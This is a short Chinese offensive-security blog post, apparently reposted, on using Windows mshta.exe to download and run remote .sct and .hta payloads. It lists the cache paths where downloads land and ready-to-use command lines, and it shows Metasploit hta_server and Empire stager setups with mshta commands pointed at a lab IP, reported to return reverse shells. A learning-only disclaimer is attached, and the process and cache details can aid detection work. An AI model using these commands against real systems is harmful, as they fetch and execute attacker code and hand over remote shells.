大家好,又见面了,我是你们的朋友全栈君。
声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。
取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。
Mshta下载&执行
mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下:
mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
其中,进行网络调用的进程为mshta.exe,本地缓存IE local cache。
执行.hta文件的命令格式如下:
mshta http://webserver/payload.hta
metasploit的exploit/windows/misc/hta_server支持.hta文件的执行:
use exploit/windows/misc/hta_server
配置对应的参数后,在目标主机cmd下执行:
mshta http://192.168.49.160:8080/c3a4XKrdsu3L.hta
在win7和win10测试,都可成功反弹shell:
Empire也支持.hta的payload:
usestager windows/hta
然后在目标主机执行:
mshta http://192.168.49.160:8000/payload.hta
win7,10成功:
使用UNC路径的命令格式为:
mshta \\webdavserver\folder\payload.hta
其中,进行网络调用的进程为svchost.exe,payload位置:WebDav本地缓存。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/159691.html原文链接:https://javaforall.net
